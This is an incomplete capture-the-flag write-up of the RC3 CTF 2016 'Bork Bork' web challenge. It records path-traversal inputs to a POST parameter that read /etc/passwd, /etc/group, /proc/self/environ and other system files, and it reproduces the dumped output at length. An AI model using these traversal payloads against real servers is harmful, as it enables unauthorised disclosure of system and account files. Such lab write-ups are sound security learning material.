RC3 CTF - 300 - Bork Bork - Web

Information#

Version#

By	Version	Comment
noraj	1.0	Creation

CTF#

• Name : RC3 CTF 2016
• Website : http://ctf.rc3.club/
• Type : Online
• Format : Jeopardy
• CTF Time : link

Description#

UPDATE: We have made changes to this challenge to make it (somewhat) stable. If what you were trying before is not working, it's because it was causing a problem for us on the back end. I assure you that what you were doing was not the easiest solution, anyway.

We all love doggos and puppers. Have some more of one of our favorite puppers, Gabe. Bork.

https://ctf.rc3.club:3100/

author:orkulus

Solution#

TL;DR: Warning, this is an incomplete writeup, we didn't solve this challenge.

We can see the server is not an apache or nginx: Server: Werkzeug/0.11.11 Python/2.7.12.

The dropdown menu is used to select a file (something.txt). The server use cat to read it en write its content into the src attribute of a video balise.

So we will try to disclose some system files into this src with the bork POST attribute.

So let's see the behaviour with:

bork=test.txt <iframe width="854" height="480" src="cat: borks/test.txt: No such file or directory?autoplay=1&loop=1" frameborder="0"></iframe>

bork=../../../../../etc/passwd

<iframe width="854" height="480" src="root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
ctfuser:x:1001:1001::/home/ctfuser:?autoplay=1&loop=1" frameborder="0"></iframe>

bork=../../../../../proc/self/environ

/LESSOPEN=|%20/usr/bin/lesspipe%20%s%EF%BF%BDPYTHONIOENCODING=UTF-8%EF%BF%BDTMUX=/tmp/tmux-1000/default,2791,1%EF%BF%BDMAIL=/var/mail/ctfuser%EF%BF%BDSSH_CLIENT=192.168.0.104%2038572%2022%EF%BF%BDUSER=ctfuser%EF%BF%BDSHLVL=4%EF%BF%BDHOME=/home/ctfuser%EF%BF%BDSSH_TTY=/dev/pts/4%EF%BF%BDLOGNAME=ctfuser%EF%BF%BDEVENT_NOEPOLL=1%EF%BF%BD_=/usr/bin/python%EF%BF%BDXDG_SESSION_ID=9%EF%BF%BDTERM=screen-256color%EF%BF%BDPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games%EF%BF%BDXDG_RUNTIME_DIR=/run/user/1000%EF%BF%BDLANG=en_US.UTF-8%EF%BF%BDLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:%EF%BF%BDSHELL=/bin/bash%EF%BF%BDLESSCLOSE=/usr/bin/lesspipe%20%s%20%s%EF%BF%BDPWD=/home/ctfuser/Web-300/app%EF%BF%BDSSH_CONNECTION=192.168.0.104%2057282%20192.168.30.121%2022%EF%BF%BDTMUX_PANE=%4%EF%BF%BD

urldecode

/LESSOPEN=| /usr/bin/lesspipe %s�PYTHONIOENCODING=UTF-8�TMUX=/tmp/tmux-1000/default,2791,1�MAIL=/var/mail/ctfuser�SSH_CLIENT=192.168.0.104 38572 22�USER=ctfuser�SHLVL=4�HOME=/home/ctfuser�SSH_TTY=/dev/pts/4�LOGNAME=ctfuser�EVENT_NOEPOLL=1�_=/usr/bin/python�XDG_SESSION_ID=9�TERM=screen-256color�PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games�XDG_RUNTIME_DIR=/run/user/1000�LANG=en_US.UTF-8�LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:�SHELL=/bin/bash�LESSCLOSE=/usr/bin/lesspipe %s %s�PWD=/home/ctfuser/Web-300/app�SSH_CONNECTION=192.168.0.104 57282 192.168.30.121 22�TMUX_PANE=%4�

bork=../../../../../etc/group

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,ubuntu
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:ubuntu
fax:x:21:
voice:x:22:
cdrom:x:24:ubuntu
floppy:x:25:ubuntu
tape:x:26:
sudo:x:27:ubuntu
audio:x:29:ubuntu
dip:x:30:ubuntu
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:ubuntu
sasl:x:45:
plugdev:x:46:ubuntu
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
syslog:x:108:
netdev:x:109:ubuntu
lxd:x:110:ubuntu
messagebus:x:111:
uuidd:x:112:
mlocate:x:113:
ssh:x:114:
admin:x:115:
ubuntu:x:1000:
docker:x:116:ubuntu
ctfuser:x:1001:

bork=../../../../../etc/issue : Ubuntu 16.04.1 LTS \n \l

bork=../../../../../proc/version : Linux version 4.4.0-47-generic (buildd@lcy01-03) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.2) ) #68-Ubuntu SMP Wed Oct 26 19:39:52 UTC 2016

bork=../../../../../etc/profile :

"# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).

if [ "$PS1" ]; then
  if [ "$BASH" ] && [ "$BASH" != "/bin/sh" ]; then
    # The file bash.bashrc already sets the default PS1.
    # PS1='\h:\w\$ '
    if [ -f /etc/bash.bashrc ]; then
      . /etc/bash.bashrc
    fi
  else
    if [ "`id -u`" -eq 0 ]; then
      PS1='# '
    else
      PS1='$ '
    fi
  fi
fi

if [ -d /etc/profile.d ]; then
  for i in /etc/profile.d/*.sh; do
    if [ -r $i ]; then
      . $i
    fi
  done
  unset i
fi

bork=../../../../../root/.bash_history : youtube video

bork=../../../../../var/log/dmessage : No such file or directory

bork=../../../../../var/mail/root : No such file or directory

bork=../../../../../var/spool/cron/crontabs/root : Permission denied

bork=../../../../../home/ctfuser/flag.txt : No such file or directory

bork=../../../../../home/ctfuser/Web-300/app/.htaccess : youtube video

bork=../../../../../home/ctfuser/Web-300/app/flag.txt : youtube video

bork=../../../../../usr/bin/lesspipe :

#!/bin/sh
#
# lessfile/lesspipe
# $Id: lessopen,v 1.4 1998/05/12 09:37:46 torin Exp $
# Plus POSIX sh changes by Y.Dirson
#
# Less filter for viewing non text files.
#
# Written by: Behan Webster <behanw@pobox.com>
# Many Modifications by Darren Stalder
# Further Modifications by Thomas Schoepf <schoepf@debian.org>
#
# combined lessfile and lesspipe to avoid duplication of decode stage
# shell is sure icky.  I'm real tempted to rewrite the whole thing in Perl
#
# Unfortunately, this means that I have filename dependencies sprinkled
# throughout the code.  If you don't want lessfile to be called that,
# you'll need to change the LESSFILE envar below.
#
# Usage: eval `lessfile`  or eval `lesspipe`
#
# less passes in:
#    $1  filename to be viewed with less  (used by LESSOPEN)
# and possibly (if used by lessfile)
#    $2  filename that was created during LESSOPEN

TMPDIR=${TMPDIR:-/tmp}
BASENAME=`basename $0`
LESSFILE=lessfile

# Helper function to list contents of ISO files (CD images)
iso_list() {
	isoinfo -d -i "$1"
	isoinfo -d -i "$1" | grep -q ^Rock\.Ridge && iiopts="$iiopts -R"
	isoinfo -d -i "$1" | grep -q ^Joliet && iiopts="$iiopts -J"
	echo
	isoinfo -f $iiopts -i "$1"
}

if [ $# -eq 1 ] ; then
	# we were called as LESSOPEN

	# if the file doesn't exist, we don't do anything
	if [ ! -r "$1" ]; then
		exit 0
	fi

	# generate filename for possible use by lesspipe
	umask 077
	if [ $BASENAME = $LESSFILE ]; then
		TMPFILE=`tempfile -d $TMPDIR -p lessf`
		if [ -z "$TMPFILE" ]; then
			echo >&2 "Could not find essential program 'tempfile'. Exiting"
      exit 1
		fi
	fi

	(
		# possibly redirect stdout to a file for lessfile
		if [ $BASENAME = $LESSFILE ]; then exec > $TMPFILE; fi

		# Allow for user defined filters
		#if [ -x ~/.lessfilter -a -O ~/.lessfilter ]; then
		if [ -x ~/.lessfilter ]; then
			~/.lessfilter "$1"
			if [ $? -eq 0 ]; then
				if [ $BASENAME = $LESSFILE ]; then
					if [ -s $TMPFILE ]; then
						echo $TMPFILE
					else
						rm -f $TMPFILE
					fi
				fi
				exit 0
			fi
		fi

		# Decode file for less
		case `echo "$1" | tr '[:upper:]' '[:lower:]'` in
			*.a)
				if [ -x "`which ar`" ]; then ar tv "$1"
				else echo "No ar available"; fi ;;

			*.arj)
				if [ -x "`which unarj`" ]; then unarj l "$1"
				else echo "No unarj available"; fi ;;

			*.tar.bz2)
				if [ -x "`which bunzip2`" ]; then
					bunzip2 -dc "$1" | tar tvvf -
				else echo "No bunzip2 available"; fi ;;

			*.bz)
				if [ -x "`which bunzip`" ]; then bunzip -c "$1"
				else echo "No bunzip available"; fi ;;

			*.bz2)
				if [ -x "`which bunzip2`" ]; then bunzip2 -dc "$1"
				else echo "No bunzip2 available"; fi ;;

			*.deb|*.udeb|*.ddeb|*.ipk)
				echo "$1:"; dpkg --info "$1"
				echo
				echo '*** Contents:'; dpkg-deb --contents "$1"
				;;

			*.doc)
				if [ -x "`which catdoc`" ]; then
					catdoc "$1"
				else
					# no catdoc, read normally if file is text.
					if ( file "$1" | grep ASCII 2>/dev/null >/dev/null); then
						cat "$1"
					else
						echo "No catdoc available";
					fi
				fi
				;;

			*.gif|*.jpeg|*.jpg|*.pcd|*.png|*.tga|*.tiff|*.tif)
				if [ -x "`which identify`" ]; then
					identify "$1"
				else
					echo "No identify available"
					echo "Install ImageMagick to browse images"
				fi
				;;

			*.iso)
				if [ -x "`which isoinfo`" ]; then iso_list "$1"
				else
					echo "No isoinfo available"
					echo "Install mkisofs to view ISO images"
				fi
				;;

			*.bin|*.raw)
				if [ -x "`which isoinfo`" ]; then
					file "$1" | grep -q ISO\.9660 && iso_list "$1"
				else
					echo "No isoinfo available"
					echo "Install mkisofs to view ISO images"
				fi
				;;

			*.lha|*.lzh)
				if [ -x "`which lha`" ]; then lha v "$1"
				else echo "No lha available"; fi ;;

			*.tar.lz|*.tlz)
				if [ -x "`which lzip`" ]; then
					lzip -dc "$1" | tar tvvf -
				elif [ -x "`which lunzip`" ]; then
					lunzip -dc "$1" | tar tvvf -
				else echo "No lzip or lunzip available"; fi ;;

			*.lz)
				if [ -x "`which lzip`" ]; then lzip -dc "$1"
				elif [ -x "`which lunzip`" ]; then lunzip -dc "$1"
				else echo "No lzip or lunzip available"; fi ;;

			*.tar.lzma)
				if [ -x "`which lzma`" ]; then
					lzma -dc "$1" | tar tfvv -
				else
					echo "No lzma available"
				fi
				;;

			*.lzma)
				if [ -x "`which lzma`" ]; then
					lzma -dc "$1"
				else
					echo "No lzma available"
				fi
				;;

			*.pdf)
				if [ -x "`which pdftotext`" ]; then pdftotext -layout "$1" -
				else echo "No pdftotext available"; fi ;;

			*.rar|*.r[0-9][0-9])
				if [ -x "`which rar`" ]; then rar v "$1"
				elif [ -x "`which unrar`" ]; then unrar v "$1"
				else echo "No rar or unrar available"; fi ;;

			*.rpm)
				if [ -x "`which rpm`" ]; then
					echo "$1:"; rpm -q -i -p "$1"
					echo
					echo '*** Contents:'
					rpm -q -l -p "$1"
				else echo "rpm isn't available, no query on rpm package possible"; fi ;;

			*.tar.gz|*.tgz|*.tar.z|*.tar.dz)
				tar tzvf "$1" --force-local
				;;

			*.tar.xz|*.txz)
				if [ -x "`which xz`" ]; then
					xz -dc "$1" | tar tfvv -
				else
					echo "No xz available"
				fi
				;;

			*.xz)
				if [ -x "`which xz`" ]; then
					xz -dc "$1"
				else
					echo "No xz available"
				fi
				;;

			# Note that this is out of alpha order so that we don't catch
			# the gzipped tar files.
			*.gz|*.z|*.dz)
				gzip -dc "$1" ;;

			*.tar)
				tar tvf "$1" --force-local
				;;

			*.jar|*.war|*.ear|*.xpi|*.zip)
				if [ -x "`which unzip`" ]; then unzip -v "$1";
				elif [ -x "`which miniunzip`" ]; then miniunzip -l "$1";
				elif [ -x "`which miniunz`" ]; then miniunz -l "$1";
				else echo "No unzip, miniunzip or miniunz available"; fi ;;

			*.7z)
				if [ -x "`which 7za`" ]; then 7za l "$1";
                                elif [ -x "`which 7zr`" ]; then 7zr l "$1";
				else echo "No 7za or 7zr available"; fi ;;

			*.zoo)
				if [ -x "`which zoo`" ]; then zoo v "$1";
				elif [ -x "`which unzoo`" ]; then unzoo -l "$1";
				else echo "No unzoo or zoo available"; fi ;;

		esac
	) 2>/dev/null

	if [ $BASENAME = $LESSFILE ]; then
		if [ -s $TMPFILE ]; then
			echo $TMPFILE
		else
			rm -f $TMPFILE
		fi
	fi

elif [ $# -eq 2 ] ; then
	#
	# we were called as LESSCLOSE
	# delete the file created if we were lessfile
	#
	if [ $BASENAME = $LESSFILE ]; then
		if [ -n "$BASH" ]; then
			if [ ! -O "$2" ]; then
				echo "Error in deleting $2" > /dev/tty
			fi
		fi

		if [ -f "$2" ]; then
			rm -f "$2"
		else
			echo "Error in deleting $2" > /dev/tty
		fi
	fi

elif [ $# -eq 0 ] ; then
	#
	# must setup shell to use LESSOPEN/LESSCLOSE
	#
	# I have no idea how some of the more esoteric shells (es, rc) do
	# things. If they don't do things in a Bourne manner, send me a patch
	# and I'll incorporate it.
	#

	# first determine the full path of lessfile/lesspipe
	# if you can determine a better way to do this, send me a patch, I've
	# not shell-scripted for many a year.
	FULLPATH=`cd \`dirname $0\`;pwd`/$BASENAME

	case "$SHELL" in
		*csh)
			if [ $BASENAME = $LESSFILE ]; then
				echo "setenv LESSOPEN \"$FULLPATH %s\";"
				echo "setenv LESSCLOSE \"$FULLPATH %s %s\";"
			else
				echo "setenv LESSOPEN \"| $FULLPATH %s\";"
				echo "setenv LESSCLOSE \"$FULLPATH %s %s\";"
			fi
			;;
		*)
			if [ $BASENAME = $LESSFILE ]; then
				echo "export LESSOPEN=\"$FULLPATH %s\";"
				echo "export LESSCLOSE=\"$FULLPATH %s %s\";"
			else
				echo "export LESSOPEN=\"| $FULLPATH %s\";"
				echo "export LESSCLOSE=\"$FULLPATH %s %s\";"
			fi
			;;
	esac

	#echo "# If you tried to view a file with a name that starts with '#', you"
	#echo "# might see this message instead of the file's contents."
	#echo "# To view the contents, try to put './' ahead of the filename when"
	#echo "# calling less."

else
	echo "Usage: eval \`$BASENAME\`"
	exit
fi

bork=../../../../../tmp/tmux-1000/default : youtube video

bork=../../../../../var/mail/ctfuser : No such file or directory

bork=../../../../../dev/pts/4 : Permission denied

bork=../../../../../home/ctfuser/Web-300/app/bork.py : youtube video

We thought that a logical way to solve the challenge was to display /etc/passwd and then some file inside like flag.txt or to inject commands like ls but that didn't work.

Another way we thought was to leak /proc/self/environ and them inject some code with user agent but there was not some HTTP_USER_AGENT environment variable.